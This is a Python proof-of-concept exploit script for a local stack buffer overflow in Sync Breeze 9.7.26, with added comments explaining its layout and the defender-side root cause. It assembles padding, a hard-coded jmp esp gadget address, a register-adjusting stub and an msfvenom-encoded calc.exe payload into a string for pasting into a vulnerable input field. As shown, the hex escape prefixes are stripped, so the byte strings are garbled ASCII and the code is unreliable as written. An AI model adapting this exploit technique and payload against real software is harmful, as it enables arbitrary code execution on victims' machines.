Sync Breeze 9.7.26 Buffer Overflow
Posted on 13 June 2017
#!/usr/bin/python
###############################################################################
# Exploit Title: Sync Breeze v9.7.26 - Local Buffer Overflow
# Date: 11-06-2017
# Exploit Author: @abatchy17 -- www.abatchy.com
# Vulnerable Software: Sync Breeze v9.7.26 (Freeware, Pro and Ultimate)
# Vendor Homepage: http://www.syncbreeze.com
# Version: 9.7.26
# Software Link: http://www.syncbreeze.com/downloads.html (Freeware, Pro and Ultimate)
# Tested On: Windows XP SP3 (x86), Win7 SP1 (x86)
#
# To trigger the exploit:
# 1. click "Add"
# 2. enter any command name
# 3. On new window, scroll down to "Exclude"
# 4. Click "Add Exclude Directory"
# 4. Paste text in exploit.txt into "Directory" field
#
##############################################################################
"""Write a proof-of-concept overflow string for Sync Breeze 9.7.26 to exploit.txt.

The script does no exploitation itself: it only assembles one string and writes
it to ``exploit.txt`` for manual pasting into the "Directory" field described in
the header.  The string is laid out as:

    4108 x "A"        padding up to the saved return address
    jmpesp            4-byte address of a ``jmp esp`` gadget in QtGui4.dll
    llamaleftovers    17-byte stub that leaves EAX = ESP + 0x100
    239 x "C"         filler so that ESP + 0x100 lands exactly on ``buf``
    buf               alphanumeric payload (msfvenom, see the comment below)

Root cause from the defender's side (as far as this listing shows): the
"Directory" text field is copied into a fixed-size stack buffer without a
length check, and the chosen gadget module is reported here with ASLR,
rebasing and SafeSEH all disabled, so a single hard-coded address works
across runs.  Bounds-checking that input and linking the shipped DLLs with
ASLR/SafeSEH support removes both halves of the condition this PoC relies on.

NOTE(review): the ``\\x`` prefixes of the hex escapes appear to have been
stripped when this listing was extracted (the same happened to the Windows
path in the gadget comment).  As shown, the string literals are plain ASCII
text rather than the bytes the surrounding comments describe.
"""

# Output file is opened without a ``with`` block, so it is only closed by the
# explicit ``a.close()`` at the end (not on an exception in between).
a = open("exploit.txt", "w")

# Message= 0x651f214e : jmp esp | asciiprint,ascii {PAGE_EXECUTE_READ} [QtGui4.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.3.4.0 (C:Program FilesSync BreezeinQtGui4.dll)
# Little-endian encoding of the gadget address above; it overwrites the saved
# return address once the padding is consumed.
jmpesp = "x4ex21x1fx65"

# Documentation only -- ``badchars`` is never read by the code below; it records
# the bytes the payload had to avoid (0x0a, 0x0d, and per the note 0x80-0xff).
badchars = "x0ax0d" # And 0x80 to 0xff

# msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -e x86/alpha_mixed BufferRegister=EAX -f python -b "x0ax0d"
# Payload as emitted by the msfvenom command above: a ``windows/exec`` stub
# running calc.exe, alphanumeric-encoded with EAX as the buffer register, i.e.
# the decoder expects EAX to point at the first byte of ``buf`` when it runs.
buf = ""
buf += "x50x59x49x49x49x49x49x49x49x49x49x49x49"
buf += "x49x49x49x49x49x37x51x5ax6ax41x58x50x30"
buf += "x41x30x41x6bx41x41x51x32x41x42x32x42x42"
buf += "x30x42x42x41x42x58x50x38x41x42x75x4ax49"
buf += "x6bx4cx5ax48x4fx72x57x70x75x50x43x30x43"
buf += "x50x4bx39x4dx35x44x71x79x50x63x54x6ex6b"
buf += "x62x70x76x50x6ex6bx42x72x46x6cx6ex6bx63"
buf += "x62x62x34x6cx4bx43x42x76x48x36x6fx68x37"
buf += "x73x7ax46x46x74x71x49x6fx4ex4cx57x4cx55"
buf += "x31x51x6cx35x52x46x4cx51x30x6ax61x6ax6f"
buf += "x64x4dx67x71x6bx77x79x72x68x72x70x52x70"
buf += "x57x6cx4bx53x62x36x70x6cx4bx52x6ax67x4c"
buf += "x4cx4bx50x4cx62x31x42x58x79x73x32x68x37"
buf += "x71x4ax71x73x61x4ex6bx63x69x31x30x35x51"
buf += "x69x43x4cx4bx50x49x64x58x58x63x46x5ax32"
buf += "x69x6ex6bx36x54x4ex6bx57x71x38x56x65x61"
buf += "x49x6fx6ex4cx69x51x7ax6fx66x6dx46x61x69"
buf += "x57x70x38x39x70x33x45x39x66x35x53x31x6d"
buf += "x68x78x75x6bx73x4dx71x34x70x75x38x64x33"
buf += "x68x4ex6bx32x78x51x34x65x51x39x43x31x76"
buf += "x4cx4bx64x4cx32x6bx6ex6bx62x78x65x4cx47"
buf += "x71x59x43x4cx4bx44x44x4cx4bx56x61x38x50"
buf += "x6fx79x52x64x54x64x34x64x63x6bx73x6bx50"
buf += "x61x50x59x71x4ax56x31x59x6fx59x70x33x6f"
buf += "x53x6fx71x4ax4cx4bx44x52x68x6bx6ex6dx53"
buf += "x6dx62x4ax56x61x4cx4dx6bx35x6dx62x75x50"
buf += "x45x50x75x50x32x70x32x48x76x51x4ex6bx30"
buf += "x6fx6fx77x39x6fx4ex35x4dx6bx58x70x4dx65"
buf += "x4ex42x53x66x62x48x6dx76x4ax35x6dx6dx4d"
buf += "x4dx69x6fx79x45x57x4cx46x66x53x4cx56x6a"
buf += "x6fx70x49x6bx6dx30x33x45x33x35x4dx6bx50"
buf += "x47x37x63x74x32x52x4fx53x5ax43x30x53x63"
buf += "x49x6fx38x55x52x43x63x51x50x6cx65x33x54"
buf += "x6ex62x45x54x38x62x45x55x50x41x41"

# Filler between the 17-byte stub and the payload: 17 + 239 = 256 = 0x100,
# matching the offset the stub adds to EAX.
junk = "C" * (239)

# Register set-up executed right after ``jmp esp``.  The three immediates sum
# to 0x100 modulo 2**32; they are split into ASCII-range bytes because the
# payload may not contain 0x0a, 0x0d or 0x80-0xff (see ``badchars``).
llamaleftovers = (
    "x54" # push ESP
    "x58" # pop EAX
    "x05x55x55x55x55" # add EAX, 0x55555555
    "x05x55x55x55x55" # add EAX, 0x55555555
    "x05x56x56x55x55" # add EAX, 0x55555656 -> EAX = old ESP + 0x100, shellcode generated should start exactly here as we're using the x86/alpha_mixed with BufferRegister to get a purely alphanumeric shellcode
)

# Final layout: padding, return-address overwrite, stub, filler, payload.
data = "A"*4108 + jmpesp + llamaleftovers + junk + buf
a.write(data)
a.close()